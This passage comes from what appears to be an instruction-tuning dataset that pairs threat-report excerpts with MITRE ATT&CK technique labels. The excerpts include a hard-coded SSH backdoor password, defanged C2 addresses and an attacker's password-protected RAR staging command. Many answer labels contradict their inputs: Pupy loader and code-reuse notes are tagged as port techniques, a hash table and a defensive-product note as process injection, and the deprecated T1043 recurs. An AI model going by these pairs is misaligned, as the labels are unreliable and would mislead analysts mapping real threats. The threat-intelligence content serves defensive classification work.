MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Internal Reconnaissance APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance", + "output": "- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 4 \u2013 Backdoored authentication function in SSH server As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered", + "output": "- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We were able to brute force the actor-provided key using the inverse arithmetic operations using the embedded salt and embedded ciphertext, so we were able to extract the embedded webshells with ease", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It then takes note of the infected machine\u2019s IP address, user, domain, hostname, OS and Service Pack, and the username and password combination that worked during the brute force routine", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We found a brute-force tool called NLBrute , with configuration files that tell us it had been set up to use an included set of username and passwords to try to break in to machines that have Remote Desktop enabled", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Common TCP ports 80 and 443 are used to blend in with routine network traffic", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Resulting script on the compromised government websites Users were redirected to https://google-updata[.]tk:443/hook.js, a BEeF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered a small piece of JavaScript code", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PUPY LOADER The Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition, although the 2017 campaign has been documented, during our research regarding MirageFox, we found a recently uploaded binary (6/8/2018) from the 2017 campaign, pretty much identical to a RAT mentioned in their RoyalAPT report, barely detected with only 7/66 detections on VirusTotal.\u00a0 APT15 Code Reuse We found the new version of the RAT on VirusTotal hunting, by a YARA signature we created based off code only found in Mirage and Reaver, both attributed to Chinese government affiliated groups", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KONNI is a RAT that is believed to have \u00a0been in use for over four years, with a wide array of functionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command and control To traverse the firewall, C2 traffic for most TG-3390 tools occurs over ports 53, 80, and 443", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as\u201d over TCP port 443.", + "output": "- T1043: Commonly Used Port\n- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1/12/14 3/5/14 127.0.0.1 N/A 3/5/14 3/31/14 103.24.0.142 Hong Kong 3/31/14 10/27/14 103.24.1.54 Hong Kong 10/27/14 11/9/14 127.0.0.1 N/A 11/9/14 5/25/15 127.0.0.3 N/A 5/25/15 Current as of this publication 127.0.0.1 N/A Table 5", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 5 shows Phishery\u2019s output to the command that injects a URL into a file named \u201cgood_test.docx\u201d, which it will save the resulting file to \u201cbad_test.docx\u201d", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It is capable of the following functions: Collect file/folder/drive information Download files and additional malware Launch/terminate/enumerate process Update configuration data Delete files Inject code from files to other running process Utilize proxy Open reverse shell Run in passive mode \u2014 instead of actively connecting to the command and control (C&C) server, the backdoor will open and listen to a port then receive commands through it Once the backdoor is loaded, it will then load the encrypted configuration file Auditcred.dll.mui/rOptimizer.dll.mui to extract the C&C information and connect to it", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Traps\u00a04.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "2e0361fd73f60c76c69806205307ccac, update.dll (MiniDuke), 425kb (internal name = \u201cUserCache.dll\u201c) 9e3f3b5e9ece79102d257e8cf982e09e, cache.dll (CozyDuke), 425kb (internal name = \u201cUserCache.dll\u201c) The two share identical export function names in their export directories, and the naming appears to be randomly assigned at compile time", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The loader will then inject a DLL backdoor into dllhost.exe", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TClient is injected into dllhost.exe Malware Analysis\u00a0 wab32res.dll (FakeRun loader) loads TClient", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI)", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 then created a WMI event subscription in order to execute the backdoor", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target.\u00a0 \u00a0The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware performs the following activities: Builds imports by dynamically loading APIs Decrypts strings needed for control server communications Performs control server communications Handles commands issued by the control server Uninstalls self from the system The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress()", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After obtaining the unique ID from the C2 server, the Trojan calls the \u201cSetAbStatById\u201d method to notify the C2 server of its status of \u201c1\u201d to notify the server it had successfully received the filename and file data", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Log.php validates the sender by User-Agent, saves the data in the \u201cUP\u201d server directory and stores the metadata in the mssql database for later reference", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropper installs 2 files:netwf.bat : executes netwf.dllnetwf.dll : the payloadThe dropper implements 2 persistence mechanisms:HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat fileCOM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3D-C4579291692E}, the CLSID of the class MMDeviceEnumerator.These 2 techniques have also been previously used by this actor.Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by explorer.exe if the COM Object hijack is performed", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BlackEnergy2 was eventually seen downloading more crimeware plugins \u2013 a custom spam plugin and a banking information stealer custom plugin", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Flash object in the .docx file, stored in uncompressed format The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Data Exfiltration The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate", + "output": "- T1115: Clipboard Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cadelspy\u2019s main payload contains its back door functionality, allowing the threat to carry out the following activities: Log keystrokes and the titles of open windows Gather clipboard data and system information Steal printer information and any documents that were sent to be printed Record audio Capture screenshots and webcam photos Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker\u2019s C&C servers", + "output": "- T1115: Clipboard Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mimikatz The threat actors also uploaded tools to scan for and exploit potential vulnerabilities in the network, such as the well-known SMB vulnerability patched in commonly exploited by EternalBlue to move laterally to other systems on the network.", + "output": "- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 Table 5", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta hb.exe 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 Hobocopy nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 tardigrade.exe fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392 Tardigrade application", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive: YYYY-MM-DD hh:mm:ss quser YYYY-MM-DD hh:mm:ss C:\\windows\\temp\\svchost.exe a -m5 -v2000m -hp{password} -inul -r \"\"{destination_file.rar}\"\" \"\"{multiple user directories linked to the victim's projects}\"\" -x*.exe -x*.msi -x*.cab -x*.inc -x*.dll -x*.db -x*.mdb -x*.htm -x*.html -x*.css -x*.jar -x*.js -x*.tmp -x*.bak -x*.dat -x*.log -x*.xml -x*.dmp -x*.dbf -x*.avi -x*.mp3 -x*.mp4 -x*.mpg -x*.mpeg -x*.asp -x*.aspx -x*.gif -x*.jpg -x*.mpp -x*.pst The threat actors typically rename the encrypted RAR archives\"", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff MD5 1ff40e79d673461cd33bd8b68f8bb5b8 Compiled 2017.08.06 11:32:36 (GMT), 2.22 Type I386 Windows Console EXE Size 101 888 Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters: Parameter Description -scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The file is named netwf.dat", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The \u201cVPN Client\u201d is a legitimate Juniper VPN software bundled with Helminth, \u00a0a malware in use by the OilRig threat agnet: JuniperSetupClientInstaller.exe 6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link) If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is installed", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 10: Network traffic to download final payload (words.exe) Once executed, the file performs the following activities: Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11)", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible 